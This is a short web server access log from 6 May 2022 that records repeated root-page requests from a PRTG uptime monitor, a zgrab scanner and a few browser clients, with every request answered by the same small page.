212.91.246.72 - - [06/May/2022:07:24:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:25:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:26:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.220.73 - - [06/May/2022:07:26:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [06/May/2022:07:27:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:28:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
213.226.123.30 - - [06/May/2022:07:28:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
64.227.169.88 - - [06/May/2022:07:28:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
212.91.246.72 - - [06/May/2022:07:29:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/May/2022:07:30:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.220.73 - - [06/May/2022:07:30:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.73 - - [06/May/2022:07:30:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [06/May/2022:07:31:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
213.226.123.30 - - [06/May/2022:07:31:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [06/May/2022:07:32:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.248.174.144 - - [06/May/2022:07:32:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
192.241.220.73 - - [06/May/2022:07:32:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [06/May/2022:07:33:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.248.174.144 - - [06/May/2022:07:33:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
